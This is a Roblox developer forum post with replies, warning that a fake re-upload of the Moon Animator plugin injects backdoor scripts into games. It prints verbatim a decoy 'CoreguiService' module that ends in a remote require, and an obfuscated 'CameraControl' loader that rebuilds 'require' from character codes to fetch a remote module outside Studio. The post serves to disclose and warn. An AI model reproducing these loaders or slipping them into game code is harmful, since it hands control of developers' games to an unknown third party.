Found a Moon Animator re-upload with a backdoor

Recently I’ve been noticing a new script appearing under Camera (while in studio)
The Script is called ‘CameraControl’ at the same time this appears (I recently just noticed this)
a new script appears in TestService called CoreguiService (obviously fake). At the end it has a require.
Here is the contents of CoreguiService:

RunService = game:GetService("RunService")
Looper = "Looper"
Import = "Import"
FileExplorer = "FileExplorer"
OpenFile = "OpenFile"
NewDir = "NewDir"
EditTheme = "EditTheme"
Welder = "Welder"
CameraRotation = "CameraRotation"
CameraRef = "CameraRef"

pcall(function()
	if RunService:IsStudio() == true then
		local Modules = {Looper, 
					Import, 
					FileExplorer, 
					OpenFile,
					NewDir,
					EditTheme,
					Welder,
					CameraRef,
					CameraRotation}
		for i,v in pairs(Modules)
		do
			return nil
		end
		
		CameraRef = "workspace.Camera,CFrame = CurrentCamera.CFrame"
		--sets current animation camera position to the workspace camera position.
		if workspace.CurrentCamera == nil then
			return nil
			--if camera doesnt exist then dont do anything
		end
	end
end)

require(4817026074)

Now the script under the Camera is definitely a backdoor loader:

local uKaQU=game:GetService("RunService"):IsStudio();local RkFQ7=true;local Tzms7=false;local MvC5A=getfenv;if uKaQU ~= RkFQ7 then MvC5A()[string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))](0x395795B6*(2+2+2-1+2+2-4)).Cool();end

Upon evaluation of this script I determined that the backdoor’s id is: https://www.roblox.com/library/4810206350/Content-Deleted

Once I loaded this asset into studio it’s just a red truss, but leaving the script’s in game and testing on a client game (not in studio). There were no similar errors in studio about the module not loading. I did further investigation by printing all Remotes in all Services. There was a RemoteEvent in JointsService with a randomized name, and parented is a RemoteFunction with a name of " ". (Note: I am using Adonis in the game, so it might be Adonis).

I disabled each plugin one by one and found that only with Moon Animator enabled did this happen.

Other notes: The backdoor only appears every time I enter studio (presumably because this is when plugins run).

This is the Moon Animator Plugin: https://www.roblox.com/library/4982478536/Moon-Animator
(Yes I know this isn’t the original Moon Animator plugin, just noticed so I thought I’d warn people.)

6 Likes

I don’t believe this is the correct place to post it at though it is a good note to make sure to verify which plugins you’re getting.

Couldn’t find another section that seemed to fit the issue.
So since it involved scripting, I thought i’d put it here.